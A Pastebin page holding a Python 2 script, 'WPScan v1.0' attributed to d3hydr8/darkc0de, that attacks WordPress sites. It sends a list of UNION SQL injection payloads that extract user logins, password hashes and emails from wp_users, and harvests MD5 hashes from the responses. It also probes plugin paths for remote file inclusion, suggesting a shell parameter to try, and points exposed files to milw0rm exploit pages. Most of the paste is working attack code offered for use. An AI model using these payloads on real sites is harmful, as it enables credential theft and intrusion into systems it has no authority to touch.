API tools faq
paste
Advertisement
Googleinurl

Wordpress Scanner

Googleinurl
Oct 9th, 2013
1,086
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.12 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #WordPress SQL/RFI/CGI scanner. SQL will check
  3. #for md5's in the source and RFI/CGI will use
  4. #http responses.
  5.  
  6. #http://www.darkc0de.com
  7. #d3hydr8[at]gmail[dot]com
  8.  
  9. import sys, urllib2, re, time, httplib
  10.  
  11. #Bad HTTP Responses
  12. BAD_RESP = [400,401,404]
  13.  
  14. def main(path):
  15.     print "[+] Testing:",host.split("/",1)[1]+path
  16.     try:
  17.         h = httplib.HTTP(host.split("/",1)[0])
  18.         h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
  19.         h.putheader("Host", host.split("/",1)[0])
  20.         h.endheaders()
  21.         resp, reason, headers = h.getreply()
  22.         return resp, reason, headers.get("Server")
  23.     except(), msg:
  24.         print "Error Occurred:",msg
  25.         pass
  26.  
  27. def timer():
  28.     now = time.localtime(time.time())
  29.     return time.asctime(now)
  30.  
  31. print "\n\t   d3hydr8[at]gmail[dot]com WPScan v1.0"
  32. print "\t------------------------------------------"
  33.  
  34. sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
  35.     "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
  36.     "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
  37.     "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
  38.     "plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
  39.     "plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--"
  40.     "plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
  41.     "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
  42.     "plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
  43.     "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  44.     "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
  45.     "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  46.     "index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
  47.     "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
  48.     "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain"]
  49.  
  50. rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",
  51.     "mygallery/myfunctions/mygallerybrowser.php":"mygallery/myfunctions/mygallerybrowser.php?myPath=shell",
  52.     "plugins/wp-table/js/wptable-button.phpp":"plugins/wp-table/js/wptable-button.phpp?wpPATH=shell",
  53.     "plugins/wordtube/wordtube-button.php":"plugins/wordtube/wordtube-button.php?wpPATH=shell",
  54.     "plugins/myflash/myflash-button.php":"plugins/myflash/myflash-button.php?wpPATH=shell",
  55.     "plugins/BackUp/Archive.php":"plugins/BackUp/Archive.php?bkpwp_plugin_path=shell",
  56.     "plugins/BackUp/Archive/Predicate.php":"plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=shell",
  57.     "plugins/BackUp/Archive/Writer.php":"plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=shell",
  58.     "plugins/BackUp/Archive/Reader.php":"plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=shell",
  59.     "plugins/sniplets/modules/syntax_highlight.php":"plugins/sniplets/modules/syntax_highlight.php?libpath=shell"}
  60.  
  61. cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
  62.     "wp-admin/users.php":"http://milw0rm.com/exploits/1059",
  63.     "xmlrpc.php":"http://milw0rm.com/exploits/1077",
  64.     "wp-includes/cache.php":"http://milw0rm.com/exploits/6",
  65.     "wp-trackback.php":"http://milw0rm.com/exploits/3095",
  66.     "plugins/mygallerytmpl.php":"http://milw0rm.com/exploits/3814",
  67.     "wp-admin/admin-ajax.php":"http://milw0rm.com/exploits/3960",
  68.     "wp-app.php":"http://milw0rm.com/exploits/4113",
  69.     "plugins/pictpress/resize.php":"http://milw0rm.com/exploits/4695",
  70.     "plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php":"http://milw0rm.com/exploits/4844",
  71.     "plugins/wp-adserve/adclick.php":"http://milw0rm.com/exploits/5013",
  72.     "wp-admin/admin.php?page=dmsguestbook":"http://milw0rm.com/exploits/5035",
  73.     "plugins/downloads-manager/upload.php":"http://milw0rm.com/exploits/6127"}
  74.  
  75. if len(sys.argv) != 2:
  76.     print "\nUsage: ./wpscan.py <site+dir>"
  77.     print "Ex: ./wpscan.py www.site.com/wp-content/\n"
  78.     sys.exit(1)
  79.  
  80. host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
  81. if host[-1] != "/":
  82.     host = host+"/"
  83.    
  84. print "\n[+] Site:",host
  85. print "[+] SQL Loaded:",len(sqls)
  86. print "[+] RFI Loaded:",len(rfis)
  87. print "[+] CGI Loaded:",len(cgis)
  88.  
  89. server = main("/")[2]
  90. print "[+] Server:",server
  91.  
  92. print "\n[+] Started:",timer()
  93.  
  94. print "\n[+] Scanning: SQL\n"
  95. for sql in sqls:
  96.     time.sleep(2) #Change this if needed
  97.     print "[+] Trying:",sql.replace("\n","")
  98.     try:
  99.         source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read()
  100.         md5s = re.findall("[a-f0-9]"*32,source)
  101.         if len(md5s) >= 1:
  102.             print "[!]",host+sql.replace("\n","")
  103.             for md5 in md5s:
  104.                 print "\n\t[+]MD5:",md5
  105.     except(urllib2.HTTPError):
  106.         pass
  107. print "\n[+] Scanning: RFI\n"
  108. for rfi, shell in rfis.items():
  109.     resp,reason,server = main(rfi)
  110.     if resp not in BAD_RESP:
  111.         print "\t[+] Got:",resp, reason
  112.         print "\t[+] Try:",host+shell
  113.     else:
  114.         print "\t[-] Got:",resp, reason
  115. print "\n[+] Scanning: CGI\n"
  116. for cgi, expl in cgis.items():
  117.     resp,reason,server = main(cgi)
  118.     if resp not in BAD_RESP:
  119.         print "\t[+] Got:",resp, reason
  120.         print "\t[+] Check:",expl
  121.     else:
  122.         print "\t[-] Got:",resp, reason
  123. print "\n[-] Done\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!